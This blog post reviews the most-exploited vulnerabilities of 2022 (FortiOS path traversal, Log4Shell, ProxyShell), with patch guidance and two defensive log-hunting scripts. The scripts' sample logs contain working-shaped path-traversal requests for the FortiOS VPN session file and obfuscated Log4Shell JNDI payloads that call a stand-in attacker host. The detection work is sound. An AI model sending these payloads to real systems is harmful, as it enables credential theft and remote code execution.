Infosec Kitty

cybersecurity news and original research

Analyzing the Top Exploited Vulnerabilities of 2022 according to the FBI, CISA, and NSA

Posted on August 6, 2023

By Jacqueline D.

There was a great article published the other day by BleepingComputer (link here) covering the joint advisory in which CISA, the FBI, the NSA and partner agencies list the vulnerabilities most routinely exploited during 2022 (CISA advisory AA23-215A). You don't need to read the article to understand this piece, but you should read it anyway! I did some digging into a few of the most concerning entries on the list, all of which have had patches available for years and should be high priorities for remediation in the coming months.

Per BleepingComputer, the top vulnerability was CVE-2018-13379, a path traversal in the SSL VPN web portal of Fortinet's FortiOS and FortiProxy that was discovered in 2018(!) and patched in 2019(!!!). A specially crafted HTTP request lets an unauthenticated attacker download system files from the device; the file attackers go after in practice is the SSL VPN session file, which contains the plaintext usernames and passwords of users with active VPN sessions. Per the NVD entry and Fortinet's advisory (FG-IR-18-384), the bug affects FortiOS 5.4.6 through 5.4.12, 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4, plus FortiProxy 1.0.0 through 1.0.7, 1.1.0 through 1.1.6, 1.2.0 through 1.2.8 and 2.0.0, and is only reachable when the SSL VPN service is enabled; the fix is to upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 (or later), or the corresponding FortiProxy release. Not only is this a problem because of the potential severity of an incident involving it, but also because this has been a known issue for more than four years and still hasn't been patched on a whole lot of systems! This is a big one to check for and fix right now, if you can. One caveat: upgrading closes the hole but does not undo a leak that already happened, so if a device ran a vulnerable build with SSL VPN exposed to the internet, treat its VPN credentials as compromised, reset them, and review VPN logins for unfamiliar sources.
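If you are hunting for past exploitation rather than just checking versions, the thing to look for in web or proxy logs is a request to the SSL VPN portal whose path or parameter, once decoded and normalized, climbs above the web root. The script below is an added example written for this post (it is not Fortinet's code and not a scanner for the device itself); it shows the canonicalization step that matters for any path-traversal hunt: decode percent-encoding repeatedly, collapse repeated slashes, then resolve `..` components and count how many escape the root. The log format and the log lines are constructed for the example; the traversal in the `lang` parameter mirrors the publicly documented shape of CVE-2018-13379 requests, and the technique applies to any path-traversal bug, not only this one.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote

# Constructed sample log lines in a simplified "client method target status"
# format (not real device logs). The traversal in the "lang" parameter mirrors
# the publicly documented shape of CVE-2018-13379 requests; the three variants
# are plain, percent-encoded and double-percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 GET /remote/login?lang=en 200
10.0.0.7 GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 200
10.0.0.9 GET /remote/fgt_lang?lang=%2F..%2F..%2F..%2F..%2Fdev%2Fcmdb%2Fsslvpn_websession 200
10.0.0.11 GET /remote/fgt_lang?lang=%252F..%252F..%252F..%252F..%252Fdev%252Fcmdb%252Fsslvpn_websession 200
10.0.0.3 GET /remote/fgt_lang?lang=en 200
10.0.0.4 GET /static/images/logo.png 200
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+)$")


def resolve_traversal(raw: str, max_decodes: int = 3) -> tuple[int, str]:
    """Canonicalize a path-like string the way a naive server-side
    concatenation would see it and count how many '..' components escape
    above the root. Percent-decoding is repeated (bounded) because attackers
    double-encode to slip past filters that decode only once. Returns
    (escapes, resolved_path); escapes > 0 means the string climbs out of
    whatever directory it was meant to stay in."""
    decoded = raw
    for _ in range(max_decodes):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    stack: list[str] = []
    escapes = 0
    for comp in decoded.split("/"):      # empty components collapse '//' runs
        if comp in ("", "."):
            continue
        if comp == "..":
            if stack:
                stack.pop()
            else:
                escapes += 1
        else:
            stack.append(comp)
    return escapes, "/" + "/".join(stack)


def find_traversal(log_text: str) -> list[dict]:
    """Flag requests whose path or any query parameter escapes the root after
    canonicalization. A 200 status on such a request is the signal that
    matters: the server answered instead of rejecting it."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        candidates = [("path", path)]
        candidates += [(f"param:{k}", v) for k, v in parse_qsl(query, keep_blank_values=True)]
        for where, value in candidates:
            escapes, resolved = resolve_traversal(value)
            if escapes > 0:
                hits.append({"client": client, "where": where, "escapes": escapes,
                             "resolved": resolved, "status": int(status)})
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(f"{hit['client']} {hit['where']} -> {hit['resolved']} "
              f"({hit['escapes']} levels above root, HTTP {hit['status']})")
```

Running it flags the three traversal requests and resolves each to the same target file, whether the attacker sent the slashes plainly, percent-encoded or double-encoded. A real hunt would pull the request lines out of your own log format and treat a 200 response to such a request on a device that was running a vulnerable build as a credential-leak incident, not just a blocked probe.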

Looking at NIST's description of CVE-2021-44228 (better known as Log4Shell), this vulnerability is, while perhaps not as glaring, certainly a critical one to address as well. It allows unauthenticated remote code execution in Apache Log4j 2: the library's JNDI lookup feature resolves strings of the form ${jndi:...} that appear in log messages or parameters, so an attacker who can get such a string into anything the application logs (a User-Agent header, a username, a search term) can make the application fetch and load code from a server they control. It is specific to the log4j-core artifact, in versions 2.0-beta9 through 2.15.0 (excluding the security releases 2.12.2, 2.12.3 and 2.3.1); applications that only depend on log4j-api, or that still use the end-of-life Log4j 1.x line, are not affected by this particular CVE, and neither are other Apache logging projects. However, due to how widespread this library is (it is bundled inside countless Java applications and appliances, not just in code you compiled yourself) and (as before) the severity of the vulnerability, this has the potential to precipitate a major incident. Therefore, it should be patched as soon as possible: upgrade to Log4j 2.17.1 or later (2.12.4 on Java 7, 2.3.2 on Java 6), and don't rely on the log4j2.formatMsgNoLookups flag alone, since that mitigation was later shown to be incomplete (CVE-2021-45046).
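Naively grepping logs for the literal string `${jndi:` misses most of what was actually thrown at servers in December 2021, because Log4j evaluates lookups recursively and attackers nested harmless lookups to spell out "jndi" (for example `${${lower:j}ndi:...}` or `${${::-j}${::-n}${::-d}${::-i}:...}`). The detector below is an added example written for this post, not code from Apache or from any Log4j tooling; it models just enough of Log4j 2's lookup substitution (innermost-first evaluation, the lower/upper lookups, and the `${key:-default}` fallback) to collapse those obfuscations and recover the JNDI target. The access-log lines are constructed for the example and use the 203.0.113.0/24 documentation range.

```python
from __future__ import annotations

import re

# Innermost ${...} lookup: a body with no nested "${" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body: str) -> str:
    """Approximate what Log4j 2 would substitute for one lookup that has no
    nested lookups left inside it. Only the behaviour the bypasses rely on
    is modelled: the lower/upper lookups transform their argument, and any
    other lookup (env, sys, date, an empty key, ...) is treated as
    unresolvable so its ${key:-default} default is what survives."""
    key, _, default = body.partition(":-")
    prefix, _, rest = key.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return default


def extract_jndi_targets(text: str, max_steps: int = 500) -> list[str]:
    """Collapse nested lookups innermost-first, which is how Log4j's
    substitutor effectively evaluates them, and return every JNDI target
    that emerges. Each step removes one '${', so the loop terminates on its
    own; max_steps is a belt-and-braces bound for hostile input."""
    targets: list[str] = []
    for _ in range(max_steps):
        m = _INNER.search(text)
        if m is None:
            break
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            targets.append(body[len("jndi:"):])
            replacement = "<JNDI>"          # marker that cannot match _INNER again
        else:
            replacement = _resolve(body)
        text = text[:m.start()] + replacement + text[m.end():]
    return targets


def scan_lines(lines: list[str]) -> list[tuple[int, str]]:
    """Return (line index, JNDI target) for every lookup found in the lines."""
    return [(i, t) for i, line in enumerate(lines) for t in extract_jndi_targets(line)]


# Constructed web-server access lines (not real traffic). Indexes 1 to 4 carry
# the plain payload and three obfuscations of the kind seen in the wild;
# index 5 is a harmless non-JNDI lookup that must not be flagged.
SAMPLE_LINES = [
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.66:1389/a}"',
    '203.0.113.11 - - "GET /?x=${${lower:j}ndi:${lower:rmi}://203.0.113.66:1099/b} HTTP/1.1" 404 "-" "curl/7.81.0"',
    '203.0.113.12 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.66/c}"',
    '203.0.113.13 - - "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.66/d}"',
    '203.0.113.14 - - "GET /docs?q=${date:yyyy} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, target in scan_lines(SAMPLE_LINES):
        print(f"line {idx}: JNDI lookup -> {target}")
```

The point of resolving rather than pattern-matching is that the output is the attacker's callback address, which is what you pivot on next (block it, search for outbound LDAP/RMI/DNS to it, check whether the JVM ever fetched a class from it). Note that a hit in a request log only proves an attempt; whether it succeeded depends on whether that input reached a vulnerable log4j-core, which is a question for the inventory and patch-level work described above.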

Also, we have CVE-2021-34523. This one is worth a lot of attention, for similar reasons to 44228. It is a vulnerability in on-premises Microsoft Exchange Server (2013, 2016 and 2019), which is used in a huge number of corporate environments. Specifically, it is an elevation-of-privilege flaw in the Exchange PowerShell backend and one of the three bugs chained together in the ProxyShell attack, alongside CVE-2021-34473 (a pre-authentication path confusion) and CVE-2021-31207 (a post-authentication arbitrary file write); together they give an unauthenticated attacker remote code execution on the server, which is why all three appear on the 2022 list. Microsoft fixed it in the April 2021 security updates (the file-write bug followed in May 2021), months before the CVE was published in July 2021, so any server still behind on its Security Updates is exposed. Because of this, it should be considered a high priority: confirm each Exchange server is on a supported Cumulative Update with the latest Security Update applied, and if one was ever reachable from the internet while unpatched, review its IIS logs and look for web shells rather than assuming the patch arrived first.

For more information about these specific vulnerabilities and this topic in general, please consult the sources below. I hope the brief analysis and resources provided here help – happy hunting!

Sources:

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

https://nvd.nist.gov/vuln/detail/CVE-2018-13379

https://nvd.nist.gov/vuln/detail/CVE-2021-34523

https://www.bleepingcomputer.com/news/security/fbi-cisa-and-nsa-reveal-top-exploited-vulnerabilities-of-2022/
